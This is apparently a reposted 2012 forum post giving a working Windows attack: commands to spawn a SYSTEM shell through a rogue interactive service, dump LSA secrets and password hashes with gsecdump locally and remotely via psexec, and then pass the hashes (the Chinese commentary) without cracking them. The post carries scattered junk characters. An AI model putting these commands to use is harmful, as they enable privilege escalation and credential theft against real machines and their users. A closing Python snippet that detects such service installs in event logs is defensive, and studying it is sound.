Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

; i: }; f1 t9 k+ b提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.* G. V+ {7 d. B1 F% X
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]7 l- J; M0 T& P+ |( x

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
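Added example, not from this post or the quoted article: the `sc create` trick above leaves a Windows System log Event ID 7045 ("A service was installed in the system") record whose image path is cmd.exe, and a `psexec -s` run installs a PSEXESVC service; this Python snippet classifies constructed records of that shape so a defender can alert on them. The field names and all sample values are assumptions made for this example.

```python
import re

# Constructed sample records shaped like Event ID 7045 message fields
# (ServiceName, ImagePath, AccountName). Values are made up for this example;
# the first two mirror the post (interactive cmd.exe service, PsExec service).
SAMPLE_7045 = [
    {"ServiceName": "shellcmdline",
     "ImagePath": r'"C:\WINDOWS\system32\cmd.exe /K start"',
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
]

# Interpreters that make no sense as a long-lived service binary; a service
# whose ImagePath launches one is almost always an interactive-shell trick.
SHELL_BINARIES = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript|mshta)\.exe\b", re.I)

# Service names dropped by remote-execution tools (PsExec installs PSEXESVC).
REMOTE_EXEC_SERVICES = {"psexesvc"}


def classify_service_install(event):
    """Return the list of reasons a 7045 record looks suspicious (empty = benign)."""
    reasons = []
    image = event.get("ImagePath", "")
    name = event.get("ServiceName", "")
    if SHELL_BINARIES.search(image):
        reasons.append("service binary is a command interpreter")
    if name.lower() in REMOTE_EXEC_SERVICES:
        reasons.append("service name used by a remote-execution tool")
    # Only worth noting once another rule fired: most real services run as SYSTEM too.
    if reasons and event.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def flag_suspicious(events):
    """Map ServiceName -> reasons for every record that triggered at least one rule."""
    flagged = {}
    for event in events:
        reasons = classify_service_install(event)
        if reasons:
            flagged[event["ServiceName"]] = reasons
    return flagged


if __name__ == "__main__":
    for name, why in flag_suspicious(SAMPLE_7045).items():
        print(f"{name}: {'; '.join(why)}")
```

In production the records would come from the System event log (or a SIEM) rather than the embedded list; pairing a 7045 hit with the StartService 1053 failure shown above is a strong indicator of this specific trick.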